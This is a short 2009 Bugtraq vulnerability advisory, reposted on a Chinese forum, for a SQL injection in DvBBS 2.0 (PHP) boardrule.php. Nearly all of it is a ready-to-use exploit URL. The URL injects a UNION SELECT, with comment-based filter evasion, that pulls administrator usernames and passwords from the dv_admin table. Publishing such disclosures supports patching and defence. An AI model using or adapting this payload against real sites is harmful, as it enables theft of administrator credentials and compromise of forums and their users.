DvBBS v2.0(PHP) boardrule.php Sql injection

看板Bugtraq作者時間16年前 (2009/09/05 02:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
########################## Securitylab.ir ######################## # Application Info: # Name: DVBBS (php) # Version: 2.0 # Vendor: http://p.dvbbs.net ################################################################# # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir ################################################################# # Vulnerability Info: # Type: Sql Injection # Risk: Medium #=========================================================== # http://site.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/ #=========================================================== ################################################################# # Securitylab Security Research Team ###################################################################
更多 info. 的文章
文章代碼(AID): #1AeLNazs (Bugtraq)